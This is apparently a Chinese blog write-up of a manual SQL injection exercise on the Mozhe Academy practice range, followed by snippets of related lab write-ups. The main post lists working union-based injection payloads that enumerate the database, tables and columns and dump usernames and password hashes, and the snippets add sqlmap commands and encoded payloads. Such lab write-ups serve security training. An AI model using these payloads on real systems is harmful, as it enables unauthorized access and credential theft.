记一次墨者学院靶场手工注入

最新推荐文章于 2025-05-16 00:15:32 发布
原创 最新推荐文章于 2025-05-16 00:15:32 发布 · 355 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

该博客记录了对WEB业务系统的SQL注入测试过程。通过SQL注入获取账号密码登录,因数据做了AES加密需找秘钥和偏移量。经尝试在通知栏找到注入点,获取数据库名、表名、字段及信息数据,密码为MD5加密。总结指出加密不能根本解决SQL注入问题。

环境信息:

环境是这样的,通过SQL注入方式,获取WEB业务系统的账号密码进行登录。

web业务数据做了AES加密,需要找到AES加密秘钥和偏移量才能进行解密。

环境地址:

http://219.XXX.XXX.228:49408/

测试过程:

访问页面如图:

尝试账号密码登录进行注入,均返回账号或密码错误,注入点不在账号密码处,只能找其他地方。

登录一栏下面有一则通知栏,点击进去,感觉值为AES加密:

http://219.XXX.XXX.228:49408/news/list.php?id=ZUlJOGMzSmVMMHQwZHhNN3diM056Zz09

历经千辛万苦终于找到一个文件找到了AES的加密算法:

解密ZUlJOGMzSmVMMHQwZHhNN3diM056Zz09,解密:结果为1_mozhe。

1 and 1=2_mozhe加密之后访问,页面报错,终于找到注入点了。

1 order by 4_mozhe,测试有4个字段(字符型需要加':1' order by 4 --+)

1 union select 1,database(),version(),4_mozhe 查看数据库名和版本信息

-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()_mozhe  获取表名

-1  union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='XXXXX'_mozhe  获取字段

-1  union select 1,group_concat(name,0x3a,password),3,4 from XXXX_mozhe  获取信息数据

得到账号密码,密码为MD5加密。

总结

加密不能从根本上解决SQL注入的问题。很久没进行手注了,都忘记语法了,正好复习一下。

 

 

 

 

 

 

 

墨者学院靶场练习
cndydmz的博客
12-06 1428
1.SQL注入漏洞测试(布尔盲注) 首先进入靶场, 然后点击上图通知,进入 然后打开sqlmap 输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 --current -db 获取数据库名 得到数据库名为stormgroup 然后输入sqlmap -u http://219.153.49.228:45907/new_list.php...
墨者学院】SQL手动注入 靶场初体验
bianxia123456的博客
04-06 5035
step1: 判断注入 判断是否存在注入,这个靶场肯定存在注入,在参数id后面拼接一些其他变量即可。 step2: 猜解列名数量 order by 关键字日常使用的时候是按照某个列名去排序,即“order by 列名字段”。 order by 后面加上序号,即按照第几列排序,order by 1,按照第一列的字段进行排序。 order by 默认升序,降序关键字DESC,即order by 字段名 DESC; 所以使用order by关键字就能够知道整个表一共有多少个列。 ...
墨者学院(4个sql靶场攻略)
2201_75891821的博客
07-22 2018
墨者学院 4种sql注入漏洞的解答 简单易理解 不复杂
墨者学院-在线靶场
weixin_42730900的博客
02-23 4312
浏览器信息伪造 更改user-agent:Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G ## 来源页伪造
墨者学院靶场
muqiyihan的博客
06-13 154
背景介绍:某单位IT运维人员,在服务器上留了一个页面用来ping内部服务器连通情况。安全工程师"墨者"检查发现这一文件存在漏洞,要求运维人员立刻下线。| linux的管道符 管道是一种通信机制,通常用于进程间的通信。ls 意思是查看文件夹,试探能不能看到系统的文件 发现有三个文件 以其中一个以K开头 应该是我需要的东西。在我尝试其他命令时发现把CAT和K中间的空格去掉后数字变红了 尝试发送发现还是不行。到这里应该想到是把空格进行了过滤 下面就应该尝试替换空格。使用Linux命令 | 尝试查看。
墨者学院SQL手工注入靶场漏洞详解
sone_yoonyul的博客
07-07 1642
墨者学院SQL手工注入靶场漏洞详解目录靶场地址步骤详解 目录 靶场地址 该靶场墨者学院安全工程师“墨者”所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1墨币(注册的时候会送十几个墨币并且不会重复消耗,只需要尽情练习即可),靶场地址: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 步骤详解 观察首页,是否有注入入口 表单处无法进行注入,这时可以发现滚动栏有个通知,点开之后发现这是一
墨者学院 SQL手工注入漏洞测试(MySQL数据库)
qq_48368964的博客
07-22 567
id=1 order by 5 回显异常,说明有四列字段。id=1 order by 1 回显正常。由于为root用户,所以可以高权限访问其他的数据库信息,可跨库查询信息,同一个服务器下的不同站点中的数据库均可查看。接下来进行信息收集,收集数据库的信息:操作系统,数据库名,数据库的用户,数据库的版本等。直接在可控变量后面随便输入值,看回显效果,回显不正常,可能存在SQL注入。观察url信息,为GET请求,存在可控变量,验证是否存在SQL注入。1 and 1=2 回显不正常,可能存在SQL注入
一篇墨者学院SQL手工注入漏洞测试(MySQL数据库)write up
最新发布
2403_87248548的博客
05-16 1282
最后再把整体的一个思维导图放下面给大家看一下吧!我把整个流程一次从左到右依次列了出来希望对大家有所帮助!
墨者学院靶场SQL手工注入漏洞测试(MySQL数据库)操作分析
YRYUNO_1的博客
02-20 293
墨者学院的SQL手工注入漏洞测试(MySQL数据库)题目进行破解。
墨者在线靶场
2302_80256359的博客
12-05 612
访问靶场后点击公告即可看见url中有ID参数。将得到的密码进行md5解密。将得到的密码进行md5解密。将得到的密码进行md5解密。将得到的密码进行md5解密。进入在线靶场的公告页面。该表中一共存在3个列。成功登录后获取Key。成功登录后获取Key。成功登录后获取Key。成功登录后获取Key。
墨者学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 2039
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码
墨者靶场(综合)
曹振国的博客
06-20 2366
初级 综合表单暴力破解实训(第1题)提示:直接使用BurpSuite抓包跑数字HTML前端代码分析(暗链)提示:打开页面:访问得到key值:SVN信息泄露漏洞分析(第1题)背景介绍提示:1.使用dirsearch扫描地址2.使用Navicat Premium打开备份文件3.访问地址得到key值WEB页面源代码查看提示:F12看的key值 表单暴力破解实训(第1题) 提示: 直接使用BurpSuite抓包跑数字 成功拿到key HTML前端代码分析(暗链) 提示: 打开页面: 查看源码发现有一
墨者学院数据库靶场
yjh20041010的博客
12-05 1146
解密。
墨者学院MySQL--sql注入靶场
weixin_43803070的博客
07-08 1707
这几天做题的时候发现了一个靶场,先做了一个SQL注入,怎么说呢,这个靶场环境还可以,但是个人感觉最后的 key获取,有点脑洞,没有太大的实际意义背离了实际的初衷,不说了直接上wp: 首先找注入点: http://219.153.49.228:40084/new_list.php?id=1‘// id=1的时候返回正常,id=1’的时候返回错误,说明存在sql注入。 http://219.153...
渗透学习—靶场篇—墨者学院—SQL注入漏洞测试(参数加密)
qq_43696276的博客
10-25 2152
这一关,难点主要在于需要我们判断参数后的加解密类型,从而引导我们去目录遍历,拿到对应的源码!!!然后呢,还需要我们能够对php代码进行审计,从而找出其参数的加密过程。。其中还有一个坑在于末尾要加上_mozhe总体而言,感觉难度还是稍有的(于我个人而言)
墨者学院——X-Forwarded-For注入漏洞实战writeUp
weixin_43862283的博客
12-24 433
墨者学院篇 X-Forwarded-For注入漏洞实战 实训目标 1、掌握SQL注入的基本原理; 2、了解服务器获取客户端IP的方式; 3、了解SQL注入的工具使用; 解题方向 对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码。 解题思路 判断注入点 爆破数据库 爆破数据表 爆破数据库列 爆破字段 将用户名秘密输入登录框,得到key CMS的URL ht...
墨者学院;sql手工注入;access;在线靶场
xiaochenhang的博客
08-20 923
恭喜你 moke 成功登录用户管理后台,KEY: mozhee7cc35d6a83a8978b4a44f56f6d。6、枚举关键表名:正常则存在admin表;通常access数据库都有admin表;8、 枚举字段:正常则页面不报错;通常access表会存在以下三个字段;,因此看到位数以及字母组成形式的字符可以迅速判断可能是MD5编码。5、access数据库没有库名,都是表名;4、输入' 成功闭合报错,有注入漏洞;1、注册账号,启动环境;9、爆一下用户账户密码;2、 得到端口号和地址;这里枚举失败,翻车;
【网络安全】-暴力破解实战-pikachu/墨者靶场
weixin_65311462的博客
09-03 1195
双载荷暴力破解:目标:pikachu-master 基于表单的暴力破解。
墨者学院sql手工注入
03-03
墨者学院提供了一个专门用于练习SQL注入技巧的安全测试平台[^2]。此靶场基于Nginx+PHP+MySQL架构构建而成,并且访问成本低廉——仅需消耗一枚虚拟货币“墨币”,新用户注册时通常会被赠送足够的余额来进行多次尝试而...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值